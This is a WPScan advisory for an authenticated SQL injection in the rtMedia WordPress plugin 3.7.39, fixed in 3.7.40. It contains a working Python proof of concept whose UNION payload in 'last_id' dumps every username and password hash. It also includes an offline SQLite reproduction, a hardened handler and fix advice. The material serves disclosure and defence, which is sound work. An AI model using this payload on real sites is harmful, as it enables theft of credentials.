rtMedia for WordPress, BuddyPress & bbPress 3.7.39 - SQL Injection

Description
When it initialises, the rtMedia plugin includes and instantiates certain classes if BuddyPress is installed. One of these is RTMediaActivityUpgrade, defined in the file ‘app/importers/RTMediaActivityUpgrade.php’. It is instantiated at line 110 of ‘admin/RTMediaAdmin.php’ whenever the ‘BuddyPress’ class is available.

Once instantiated, RTMediaActivityUpgrade registers an AJAX action named ‘rtmedia_activity_upgrade’. This action can be invoked by any registered (logged-in) user, and the ‘last_id’ parameter it reads from the request is susceptible to SQL injection, as the proof of concept below shows.
Proof of Concept

import requests, json

s = requests.session()
target = 'http://localhost'

# Step 1: log in as any registered, low-privilege user; the AJAX action
# below is exposed to every authenticated account.
url = '%s/wp-login.php' % target
payload = {
	"log": "test",
	"pwd": "test",
	"wp-submit": "Log In"
}
r = s.post(url, data=payload)

# Step 2: call the rtmedia_activity_upgrade action with a UNION-based
# injection in last_id. The original rows are suppressed with AND 1=0, the
# UNION supplies the 24 columns the query expects, and the subquery that
# concatenates user_login:user_pass from wp_users sits in the 12th column,
# which is the value the handler echoes back as activity_id.
url = '%s/wp-admin/admin-ajax.php' % target
payload = {
	"action": "rtmedia_activity_upgrade",
	"last_id": "0 AND 1=0 GROUP BY id UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,(select group_concat(concat_ws(char(58),wp_users.user_login,wp_users.user_pass)) from wp_users group by 1=1),13,14,15,16,17,18,19,20,21,22,23,24 FROM wp_rt_rtm_media GROUP BY id--"
}
r = s.post(url, data=payload)

# The leaked login:hash pairs are returned in the JSON response.
print(json.loads(r.text)['activity_id'])
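
The following is an added, self-contained example (not rtMedia's code and not part of the original advisory) that reproduces the mechanics of the injection above against an in-memory SQLite database, so the payload can be studied offline. It assumes a hypothetical handler that concatenates last_id into a query over wp_rt_rtm_media and returns the 12th column as activity_id; the table layout, the user rows and the hash strings are constructed, and the MySQL-only parts of the payload (concat_ws, char(58), GROUP BY 1=1) are rewritten for SQLite. A hardened handler that validates and binds the parameter is shown alongside it.

```python
import sqlite3

# Constructed fixture (not data from the advisory): a scaled-down stand-in for
# the two WordPress tables the PoC touches.  wp_rt_rtm_media gets 24 columns
# because the UNION in the payload selects 24 values; the 12th column is the
# one the handler echoes back, so it is named activity_id here.  wp_users
# holds the rows the attacker is after.
MEDIA_COLUMNS = (["id"] + [f"c{i}" for i in range(2, 12)]
                 + ["activity_id"] + [f"c{i}" for i in range(13, 25)])


def build_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE wp_rt_rtm_media (%s)" % ", ".join(
        "id INTEGER PRIMARY KEY" if c == "id" else f"{c} INTEGER"
        for c in MEDIA_COLUMNS))
    db.execute("INSERT INTO wp_rt_rtm_media (id, activity_id) VALUES (1, 101), (2, 102)")
    db.execute("CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, "
               "user_login TEXT, user_pass TEXT)")
    db.executemany("INSERT INTO wp_users VALUES (?, ?, ?)", [
        (1, "admin", "$P$BconstructedHashOne"),   # placeholder hash strings
        (2, "test", "$P$BconstructedHashTwo"),
    ])
    return db


def vulnerable_handler(db, last_id):
    """Hypothetical handler modelled on the advisory: the request parameter is
    concatenated straight into the SQL text (this is NOT rtMedia's code)."""
    sql = f"SELECT * FROM wp_rt_rtm_media WHERE id > {last_id} ORDER BY id"
    row = db.execute(sql).fetchone()
    return {"activity_id": row[11] if row else None}


def safe_handler(db, last_id):
    """Hardened form: reject anything that is not an integer, then bind it.
    In WordPress the same idea is absint() plus $wpdb->prepare(..., '%d')."""
    try:
        last_id = int(str(last_id), 10)
    except ValueError:
        return {"error": "last_id must be an integer"}
    row = db.execute("SELECT * FROM wp_rt_rtm_media WHERE id > ? ORDER BY id",
                     (last_id,)).fetchone()
    return {"activity_id": row[11] if row else None}


# The advisory's payload with MySQL-only pieces (concat_ws, char(58), the
# redundant GROUP BY 1=1) rewritten for SQLite; the structure is unchanged:
# suppress the original rows with AND 1=0, UNION in 24 columns, put the
# subquery in column 12, and comment out whatever the handler appends.
PAYLOAD = ("0 AND 1=0 GROUP BY id UNION ALL SELECT "
           "1,2,3,4,5,6,7,8,9,10,11,"
           "(select group_concat(user_login || ':' || user_pass) from wp_users),"
           "13,14,15,16,17,18,19,20,21,22,23,24 FROM wp_rt_rtm_media GROUP BY id--")


if __name__ == "__main__":
    db = build_db()
    print("benign   :", vulnerable_handler(db, "0"))
    print("injected :", vulnerable_handler(db, PAYLOAD))
    print("hardened :", safe_handler(db, PAYLOAD))
```

Run as-is and the injected call returns every login:hash pair from wp_users in the activity_id field, while the hardened handler rejects the same input before it ever reaches the database. In the plugin itself the equivalent fix is to cast last_id with absint() and pass it through $wpdb->prepare() with a %d placeholder; since the advisory notes that any registered user can reach this upgrade action, gating it behind a capability check such as current_user_can('manage_options') and a nonce is also advisable.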

Affects

Plugin buddypress-media
fixed in version 3.7.40

References

URL https://research.g0blin.co.uk/g0blin-00046/

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter James Hooker
Submitter Website https://research.g0blin.co.uk
Submitter Twitter g0blinResearch
Views 270
Verified No
WPVDB ID 7950

Timeline

Publicly Published 2015-04-28
Added 2015-04-28
Last Updated 2015-05-15

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.